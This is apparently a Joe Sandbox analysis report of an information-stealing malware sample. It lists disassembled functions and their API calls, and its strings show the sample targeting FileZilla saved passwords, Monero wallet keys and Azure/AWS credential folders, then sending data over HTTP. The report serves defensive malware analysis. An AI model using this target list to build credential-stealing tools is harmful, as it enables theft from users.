                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 1942843190-555421843
                        • Opcode ID: 40bde837dcf66b751ef62f5b2fd40393f959f9a427729a8b18f654e66db19f4f
                        • Instruction ID: 2c2e793772004a30aa9f962568d6bdb29176c2c48678754d52e4e111b41e6c73
                        • Opcode Fuzzy Hash: 40bde837dcf66b751ef62f5b2fd40393f959f9a427729a8b18f654e66db19f4f
                        • Instruction Fuzzy Hash: 0DD13F72900208ABCB14FBE0DD9EEEE7BB8BF54300F545468F142B7095DE39AA45CB61
                        Function 00E25960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                          • Part of subcall function 00E247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E24839
                          • Part of subcall function 00E247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E24849
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E259F8
                        • StrCmpCA.SHLWAPI(?,0196FA58), ref: 00E25A13
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E25B93
                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0196FA08,00000000,?,0196ED50,00000000,?,00E41A1C), ref: 00E25E71
                        • lstrlen.KERNEL32(00000000), ref: 00E25E82
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00E25E93
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E25E9A
                        • lstrlen.KERNEL32(00000000), ref: 00E25EAF
                        • lstrlen.KERNEL32(00000000), ref: 00E25ED8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E25EF1
                        • lstrlen.KERNEL32(00000000,?,?), ref: 00E25F1B
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E25F2F
                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00E25F4C
                        • InternetCloseHandle.WININET(00000000), ref: 00E25FB0
                        • InternetCloseHandle.WININET(00000000), ref: 00E25FBD
                        • HttpOpenRequestA.WININET(00000000,0196F988,?,0196F4B0,00000000,00000000,00400100,00000000), ref: 00E25BF8
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                        • InternetCloseHandle.WININET(00000000), ref: 00E25FC7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 874700897-2180234286
                        • Opcode ID: 32746230f72037f71b7801a1a004403f08dd928f3a955fcf17abb8fce5f68f6c
                        • Instruction ID: 9d98aed8f6300ce2a398e83f473973cbab09cba7e0d39d0e82119d9460dfe337
                        • Opcode Fuzzy Hash: 32746230f72037f71b7801a1a004403f08dd928f3a955fcf17abb8fce5f68f6c
                        • Instruction Fuzzy Hash: B6120F72920118AADB19EBA0DC9DFEEB7B8BF54700F4451A9F14673091DF342A89CF61
                        Function 00E2CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                          • Part of subcall function 00E38B60: GetSystemTime.KERNEL32(00E40E1A,0196E990,00E405AE,?,?,00E213F9,?,0000001A,00E40E1A,00000000,?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E38B86
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E2CF83
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E2D0C7
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E2D0CE
                        • lstrcat.KERNEL32(?,00000000), ref: 00E2D208
                        • lstrcat.KERNEL32(?,00E41478), ref: 00E2D217
                        • lstrcat.KERNEL32(?,00000000), ref: 00E2D22A
                        • lstrcat.KERNEL32(?,00E4147C), ref: 00E2D239
                        • lstrcat.KERNEL32(?,00000000), ref: 00E2D24C
                        • lstrcat.KERNEL32(?,00E41480), ref: 00E2D25B
                        • lstrcat.KERNEL32(?,00000000), ref: 00E2D26E
                        • lstrcat.KERNEL32(?,00E41484), ref: 00E2D27D
                        • lstrcat.KERNEL32(?,00000000), ref: 00E2D290
                        • lstrcat.KERNEL32(?,00E41488), ref: 00E2D29F
                        • lstrcat.KERNEL32(?,00000000), ref: 00E2D2B2
                        • lstrcat.KERNEL32(?,00E4148C), ref: 00E2D2C1
                        • lstrcat.KERNEL32(?,00000000), ref: 00E2D2D4
                        • lstrcat.KERNEL32(?,00E41490), ref: 00E2D2E3
                          • Part of subcall function 00E3A820: lstrlen.KERNEL32(00E24F05,?,?,00E24F05,00E40DDE), ref: 00E3A82B
                          • Part of subcall function 00E3A820: lstrcpy.KERNEL32(00E40DDE,00000000), ref: 00E3A885
                        • lstrlen.KERNEL32(?), ref: 00E2D32A
                        • lstrlen.KERNEL32(?), ref: 00E2D339
                          • Part of subcall function 00E3AA70: StrCmpCA.SHLWAPI(01968980,00E2A7A7,?,00E2A7A7,01968980), ref: 00E3AA8F
                        • DeleteFileA.KERNEL32(00000000), ref: 00E2D3B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                        • String ID:
                        • API String ID: 1956182324-0
                        • Opcode ID: f450f422c54c9479a386aa4f3349e771d51d4c32c9d2a4b470579692dfe6f4c2
                        • Instruction ID: aac3d3d1dc894b80369204406a96545b334ddf650ef9d87e9c02bfc1a7438354
                        • Opcode Fuzzy Hash: f450f422c54c9479a386aa4f3349e771d51d4c32c9d2a4b470579692dfe6f4c2
                        • Instruction Fuzzy Hash: B7E12272910108ABCB18FBA0DD9AEEE77B8BF54300F145169F187B7091DE35AE45CB62
                        Function 00E2C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0196DF38,00000000,?,00E4144C,00000000,?,?), ref: 00E2CA6C
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00E2CA89
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00E2CA95
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E2CAA8
                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00E2CAD9
                        • StrStrA.SHLWAPI(?,0196DF08,00E40B52), ref: 00E2CAF7
                        • StrStrA.SHLWAPI(00000000,0196DF50), ref: 00E2CB1E
                        • StrStrA.SHLWAPI(?,0196E678,00000000,?,00E41458,00000000,?,00000000,00000000,?,01968A40,00000000,?,00E41454,00000000,?), ref: 00E2CCA2
                        • StrStrA.SHLWAPI(00000000,0196E718), ref: 00E2CCB9
                          • Part of subcall function 00E2C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E2C871
                          • Part of subcall function 00E2C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E2C87C
                        • StrStrA.SHLWAPI(?,0196E718,00000000,?,00E4145C,00000000,?,00000000,019688C0), ref: 00E2CD5A
                        • StrStrA.SHLWAPI(00000000,01968AB0), ref: 00E2CD71
                          • Part of subcall function 00E2C820: lstrcat.KERNEL32(?,00E40B46), ref: 00E2C943
                          • Part of subcall function 00E2C820: lstrcat.KERNEL32(?,00E40B47), ref: 00E2C957
                          • Part of subcall function 00E2C820: lstrcat.KERNEL32(?,00E40B4E), ref: 00E2C978
                        • lstrlen.KERNEL32(00000000), ref: 00E2CE44
                        • CloseHandle.KERNEL32(00000000), ref: 00E2CE9C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                        • String ID:
                        • API String ID: 3744635739-3916222277
                        • Opcode ID: f920b864b4b7dfe0ff9a98010036b03e2b0e9e786d5066c8d4a73561cd28e392
                        • Instruction ID: 0ad81dbf02c6bc4b10544b355dadedb1cab0b5083171444758b468b27c172392
                        • Opcode Fuzzy Hash: f920b864b4b7dfe0ff9a98010036b03e2b0e9e786d5066c8d4a73561cd28e392
                        • Instruction Fuzzy Hash: 05E10F72900108ABDB18FBA0DC99FEEBBB8AF54300F445169F14677191DF346A8ACB61
                        Function 00E38320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                        • RegOpenKeyExA.ADVAPI32(00000000,0196C140,00000000,00020019,00000000,00E405B6), ref: 00E383A4
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00E38426
                        • wsprintfA.USER32 ref: 00E38459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00E3847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 00E3848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 00E38499
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                        • String ID: - $%s\%s$?
                        • API String ID: 3246050789-3278919252
                        • Opcode ID: e3b0ba09dfff589d2f29ac718314d1401872ca7aa79a2aa8200d0d0c01d6a808
                        • Instruction ID: 5ea4aa05ef40b8a96a8159441394874e3a89ff3105370024f21331a50e241295
                        • Opcode Fuzzy Hash: e3b0ba09dfff589d2f29ac718314d1401872ca7aa79a2aa8200d0d0c01d6a808
                        • Instruction Fuzzy Hash: 0781DBB1910218AADB28EF54CD99FEA7BB8BB48700F0092D9F149B6140DF756B85CF94
                        Function 00E34D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E38DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E38E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00E34DB0
                        • lstrcat.KERNEL32(?,\.azure\), ref: 00E34DCD
                          • Part of subcall function 00E34910: wsprintfA.USER32 ref: 00E3492C
                          • Part of subcall function 00E34910: FindFirstFileA.KERNEL32(?,?), ref: 00E34943
                        • lstrcat.KERNEL32(?,00000000), ref: 00E34E3C
                        • lstrcat.KERNEL32(?,\.aws\), ref: 00E34E59
                          • Part of subcall function 00E34910: StrCmpCA.SHLWAPI(?,00E40FDC), ref: 00E34971
                          • Part of subcall function 00E34910: StrCmpCA.SHLWAPI(?,00E40FE0), ref: 00E34987
                          • Part of subcall function 00E34910: FindNextFileA.KERNEL32(000000FF,?), ref: 00E34B7D
                          • Part of subcall function 00E34910: FindClose.KERNEL32(000000FF), ref: 00E34B92
                        • lstrcat.KERNEL32(?,00000000), ref: 00E34EC8
                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00E34EE5
                          • Part of subcall function 00E34910: wsprintfA.USER32 ref: 00E349B0
                          • Part of subcall function 00E34910: StrCmpCA.SHLWAPI(?,00E408D2), ref: 00E349C5
                          • Part of subcall function 00E34910: wsprintfA.USER32 ref: 00E349E2
                          • Part of subcall function 00E34910: PathMatchSpecA.SHLWAPI(?,?), ref: 00E34A1E
                          • Part of subcall function 00E34910: lstrcat.KERNEL32(?,0196FAF8), ref: 00E34A4A
                          • Part of subcall function 00E34910: lstrcat.KERNEL32(?,00E40FF8), ref: 00E34A5C
                          • Part of subcall function 00E34910: lstrcat.KERNEL32(?,?), ref: 00E34A70
                          • Part of subcall function 00E34910: lstrcat.KERNEL32(?,00E40FFC), ref: 00E34A82
                          • Part of subcall function 00E34910: lstrcat.KERNEL32(?,?), ref: 00E34A96
                          • Part of subcall function 00E34910: CopyFileA.KERNEL32(?,?,00000001), ref: 00E34AAC
                          • Part of subcall function 00E34910: DeleteFileA.KERNEL32(?), ref: 00E34B31
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                        • API String ID: 949356159-974132213
                        • Opcode ID: 59865420c23faa6b981f34cc2075cd35c8f7246cf58522a0cc1120e7743af29e
                        • Instruction ID: e6d248e8d5a204dab05e41383559e8fe4b17f6bb053637190d74e78dc78041de
                        • Opcode Fuzzy Hash: 59865420c23faa6b981f34cc2075cd35c8f7246cf58522a0cc1120e7743af29e
                        • Instruction Fuzzy Hash: 014184BAA4030866CB24F760EC4BFED3678AB64700F4054D4B285760C1EEB597C9CB92
                        Function 00E39010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                        Download Yara Rule
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E3906C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateGlobalStream
                        • String ID: image/jpeg
                        • API String ID: 2244384528-3785015651
                        • Opcode ID: 9ccc36ba17821a4f45223150c4e9e61d902a4f2b830548f8fec442a6898f4273
                        • Instruction ID: ebf9edb38392b51a34ff8552969eb55173d2ac798a36d4503dd75321a2696907
                        • Opcode Fuzzy Hash: 9ccc36ba17821a4f45223150c4e9e61d902a4f2b830548f8fec442a6898f4273
                        • Instruction Fuzzy Hash: 7B71ED71A10208EFDB14EBE4D989FEEBBB8BF48300F108548F555B7294DB79A905CB60
                        Function 00E32E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00E331C5
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00E3335D
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00E334EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
